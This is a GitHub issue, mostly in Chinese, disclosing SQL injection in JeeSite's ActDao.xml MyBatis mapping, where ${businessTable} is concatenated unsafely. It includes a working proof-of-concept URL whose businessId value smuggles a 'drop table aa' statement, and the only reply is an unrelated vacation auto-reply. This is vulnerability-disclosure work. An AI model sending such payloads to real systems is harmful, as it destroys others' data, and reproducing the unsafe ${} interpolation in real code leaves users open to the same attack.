mybatis tablename sql injection

Question

mybatis tablename sql injection

BACMiao opened this issue 2 years ago · 2 comments

sql mappings

以下的**${businessTable}**存在SQL注入的风险

src/main/resources/mappings/modules/act/ActDao.xml
<mapper namespace="com.thinkgem.jeesite.modules.act.dao.ActDao">
    
	<update id="updateProcInsIdByBusinessId">
		UPDATE ${businessTable} SET 
			proc_ins_id = #{procInsId}
		WHERE id = #{businessId}
	</update>
	
</mapper>

RequestMapping

com.thinkgem.jeesite.modules.act.web.ActTaskController 类中的 start 方法

Call Stack

SQL Inject

当用户为jdbc.url添加**&allowMultiQueries=true**并启动程序后，此时Spring允许批量更新，就能进行SQL注入了

测试表为aa表

任意用户执行以下url，

url: http://localhost:8080/jeesite/a/act/task/start?procDefKey=test_audit&title=dd&businessTable=79&businessId=oa_test_audit%20set%20proc_ins_id%20=%20%271%27%20where%20id=%2779%27;drop%20table%20aa;--

Mybatis将SQL进行拼接并删去aa表，

再次执行上述url时，此时已经不存在aa数据表了

查看mysql，发现aa表已经被删除

think-gem commented a year ago

3075001

Answer 1 · 2023-05-16T08:02:52.000Z

这是来自QQ邮箱的假期自动回复邮件。你好，我最近正在休假中，无法亲自回复你的邮件。我将在假期结束后，尽快给你回复。